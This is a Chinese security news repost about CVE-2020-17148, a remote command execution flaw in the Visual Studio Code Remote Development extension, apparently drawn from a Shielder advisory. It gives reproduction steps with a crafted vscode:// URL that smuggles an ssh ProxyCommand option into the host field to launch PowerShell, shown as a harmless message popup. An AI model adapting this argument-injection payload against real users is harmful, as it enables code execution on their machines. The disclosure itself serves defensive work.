更多全球网络安全资讯尽在邑安全
分隔开发环境来避免影响本地机器配置;使用本地操作系统中没有的工具或运行时环境和管理多个版本;使用Windows Linux子系统来开发Linux部署的应用;远程开发扩展包中的每个扩展都可以直接在容器或WSL中运行命令和其他扩展,就像在本地运行一样。
vscode://vscode-remote/ssh-remote+$REMOTE_HOST+$PATH_OF_PROJECT_ON_THE_REMOTE_HOSTssh -T -D $RANDOM_PORT "$REMOTE_HOST" bash1、安装 Visual Studio Code;2、安装“Remote Development”扩展(https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.vscode-remote-extensionpack);3、打开浏览器,访问URL: vscode://vscode-remote/ssh-remote+-oProxyCommand=C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -c msg %username% command_injection" "[email protected]+/a4、确认打开 VSCode5、选择随机的操作系统(Linux / Windows / MacOS)6、注意powershell执行的含有“command_injection”消息的弹窗。
原文来自: 4hou.com
原文链接: https://www.shielder.it/advisories/remote-command-execution-in-visual-studio-code-remote-development-extension/
推荐文章
1
2
原文始发于微信公众号(邑安全):CVE-2020-17148:Visual Studio代码远程开发扩展RCE漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论